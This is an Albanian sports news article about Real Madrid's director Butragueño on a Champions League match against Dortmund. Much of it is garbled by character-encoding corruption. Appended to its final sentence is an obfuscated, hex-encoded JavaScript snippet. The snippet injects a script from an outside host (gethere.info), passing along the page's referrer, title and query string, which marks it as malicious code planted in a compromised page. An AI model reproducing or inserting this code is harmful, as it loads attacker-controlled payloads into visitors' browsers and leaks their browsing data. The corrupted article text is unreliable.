largea_dortmundi121352152547

Mourinho shkarkohet po humbi ndaj Dortmundit

Drejtori sportiv i Real Madridit, Emilio Butragenjo ka deklaruar se sfida kundA�r BorusisA� sA� Dortmundit nA� LigA�n e KampionA�ve, qA� zhvillohet tA� martA�n nA� mbrA�mje A�shtA� me rA�ndA�si tA� madhe pA�r skuadrA�n e tij.

KA�to dy skuadra janA� ballafaquar edhe para dy javA�sh, ku fitores iu gA�zuan gjermanA�t, me rezultat 2:1. a�?Kjo ndeshje A�shtA� e rA�ndA�sisA� jetike.

Duam ta mbyllim fazA�n e grupeve nA� pozitA�n e parA�, ngase nA�se nuk e arrijmA� njA� gjA� tA� tillA� gjA�rat e 1/8 e finales mund tA� bA�hen shumA� mA� tA� komplikuaraa�?, ka theksuar Butragenjo. Reali aktualisht ndodhet nA� pozitA�n e dytA� nA� renditjen e Grupit D, me 1 pikA� ngecje ndaj BorusisA� sA� Dortmundit.

Pozita e tretA� i takon Ajaksit, derisa ManA�ester Siti ndodhet i fundit. a�?Pas ndeshjes me BorusinA� do tA� udhA�tojmA� nA� ManA�ester. Atje na pret njA� sfidA� e vA�shtirA�, ngase Sitit i duhet patjetA�r fitorja nA�se dA�shiron tA� kalojA� tutje. PA�r kA�tA� arsye nuk guxojmA� tA� tregohemi tA� pasuksesshA�m nA� shtA�pia�?, ka shtuar Butragenjo.

Ai mA� pas ka komentuar edhe ndeshjen e fundit tA� klubit tA� tij nA� kampionatin spanjoll, ku Reali e mposhti SaragozA�n, me rezultat 4:0. NA� kA�tA� sfidA� shA�nuan edhe dy pA�rforcimet e verA�s sA� kaluar, Mikael Esien dhe Luka Modric. a�?A�shtA� njA� lajm i mirA� se dy mesfushorA� shA�nuan gola.

Esien ka shA�nuar njA� gol tA� bukur, kurse Modric gjithnjA� e mA� shumA� po pA�rfshihet nA� lojA�n e skuadrA�s dhe nA� tA� ardhmen sigurisht se do ta rrisA� edhe mA� shumA� nivelin e tij tA� lojA�s.

Tash tA� shohim tA� martA�n se A�do tA� bA�jA� e tA�rA� skuadra, nA� njA� ndeshje shumA� tA� rA�ndA�sishme pA�r Realina�?, ka nA�nvizuar Butragenjo. DeklaratA� kjo qA� i jep sinjal Mourinho, qA� tA� ketA� kujdes pasi mund ta��i kushtoi me vendin e punA�s?var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}